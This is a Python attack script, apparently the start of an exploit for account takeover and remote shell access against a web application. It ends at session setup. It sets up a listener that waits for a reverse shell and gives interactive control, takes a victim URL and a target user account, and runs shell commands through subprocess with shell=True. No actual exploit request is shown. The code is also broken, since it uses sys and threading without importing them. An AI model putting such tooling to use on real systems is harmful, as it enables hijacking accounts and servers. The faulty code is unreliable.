exploit.py

import argparse
import requests
import json
import random
import subprocess, os
import string
from pwn import listen

from callback import Callback

#### LOGGING
def success(text):
    print("[\033[32;1m+\033[0m] " + text + "\033[0m")
def failure(text):
    print("[\033[31;1m✘\033[0m] \033[31;1m" + text + "\033[0m")
    sys.exit()
def info(text):
	print("[\033[34;1m*\033[0m] " + text + "\033[0m")
def dbg(text):
    if args.debug:
        print("[\033[90m#\033[0m] " + text + "\033[0m")

#### UTILS
def random_string(n): 
	return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))
	
def cmd(command):
    return subprocess.check_output(command, shell=True).decode("utf-8").splitlines()
    
def start_listener(port=1337):
	listener = listen(port)

	def handle_connection():
		conn = listener.wait_for_connection()
		conn.interactive()
	
	# Start the listener in a background thread
	listener_thread = threading.Thread(target=handle_connection)
	listener_thread.start()
	
	return listener

#### EXPLOITATION
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="")
    #parser.add_argument("--", required=True, help="")
    parser.add_argument("--user", required=True, help="The users account to take over")
    parser.add_argument("--url", required=True, help="URL of the victim application")
    parser.add_argument("--ip", help="IPv4 of your local machine for reverse shell.")
    parser.add_argument("--port", help="Port for reverse shell")
    parser.add_argument("--proxy", help='proxy everything through burp', action='store_true', default=False)
    parser.add_argument("--debug", action='store_true', default=False, help='Enable debugging output')
    args = parser.parse_args()

    url = args.url.rstrip('/')
    port = args.port
    user = args.user
    proxy = args.proxy
	
    if args.proxy:
        os.environ['http_proxy'] = 'http://127.0.0.1:8080'
        os.environ['https_proxy'] = 'https://127.0.0.1:8080'
    proxies = {
	'http':'http://127.0.0.1:8080',
	'https':'https://127.0.0.1:8080'
    }

    s = requests.Session()